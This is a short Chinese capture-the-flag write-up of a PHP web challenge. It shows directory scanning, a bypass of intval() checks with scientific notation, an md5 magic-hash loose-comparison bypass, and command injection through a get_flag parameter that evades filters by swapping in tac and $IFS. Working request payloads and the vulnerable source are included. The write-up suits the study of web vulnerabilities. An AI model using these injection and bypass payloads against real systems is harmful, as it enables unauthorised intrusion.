dirsearch扫吧
然后就可以得到 robots.txt了 记得降低点线程
-t 50 这样
我们去访问一下
去看看 但是这个文件名一看就是fake的
抓抓包看看有没有传递什么吧
这里不是很顺的 其实前面耶抓包看看了 但是没有东西就不放上来了
访问一下咯
乱码 火狐 ALT -> 查看 -> 修复文字编码 即可
intval 科学计数法绕过
//level 1
if (isset($_GET['num'])){
$num = $_GET['num'];
if(intval($num) < 2020 && intval($num + 1) > 2021){
echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
}else{
die("金钱解决不了穷人的本质问题");
}
}else{
die("去非洲吧");
}
第一个 是关于 intval的漏洞
intval(num,进制)
这里主要 可以通过进制的方式绕过 因为默认是10进制
这里主要是通过 科学计数法绕过
1e10 会被识别为1
但是 1e10+1后就会恢复原本
<?php
$a='1e10';
echo intval($a);
echo "<br />";
echo intval($a+1);
所以我们传入 ?num=1e10
md5特殊
}
//level 2
if (isset($_GET['md5'])){
$md5=$_GET['md5'];
if ($md5==md5($md5))
echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
else
die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
die("去非洲吧");
}
这里主要是特殊的MD5 加密后是和原本值一样 我们去搜一下就行了0e215962017
过滤空格和替换cat
cat可以使用tac
空格可以使用$IFS
我们先看看我们要读取什么文件
?num=1e10&md5=0e215962017&get_flag=ls
多半就是猎奇的flag了
?num=1e10&md5=0e215962017&get_flag=tac$IFS'fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag'